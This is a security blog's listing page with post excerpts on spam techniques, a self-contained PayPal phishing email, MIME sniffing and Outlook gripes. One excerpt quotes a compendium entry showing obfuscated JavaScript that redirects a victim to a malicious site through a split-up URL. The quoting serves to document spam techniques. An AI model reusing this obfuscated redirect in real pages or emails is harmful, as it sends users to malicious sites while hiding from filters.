Spam & Phishing

New Spammer’s Compendium Entry:The Responsibility Transfer

Source: http://www.virusbtn.com/resources/spammerscompendium/responsibility.xml The Responsibility Transfer UO!Responsibility!JavaScript 31 August 2010 Description Using an attached HTML document that contains almost the same page as the HTML-part of the email body, but uses obfuscated JavaScript to redirect the user to a malicious website. Submitted by Sorin Mustaca. Example <script>function r(){};fQ=false;d="";r.prototype = {p : function() { this.j='';var pN=54899;s=false;this.k="k";this.kH=22581;c='';l=64422; document.location.href=String("htt"+"p:/"+"/tr"+"ace"+"boo"+"k.u"+"s/1"+".htOnc".substr(0,3)+"ml"); […]

News

10 reasons why I hate MS Outlook

1. It is crashing continuously because it is locked in some intensive I/O and the OS (yes, *their* own OS) is killing the application as being non responsive. 2. Lack of good plugins. In contrary to Thunderbird where there are thousand of plugins, the really good plugins for Outlook are very few. 3. Eats up […]

General

Bug or feature: Mime Type Detection

Also known as MIME Sniffing, this is a feature or bug in IE which is the only browser able to dynamically determine the content type of the document it loads. So, in this case, it detects a plain text document with HTML content instead of a an JPG header. And the content of the “JPG” […]

Spam & Phishing

Paypal phishing w/o hosted HTML files

It is the first time I can see a phishing that doesn’t have a website to store the website ! This email came as a self sustained phishing solution. It is written in HTML and JS and it has a FORM whos action is POST to a website which saves the data. The submit button […]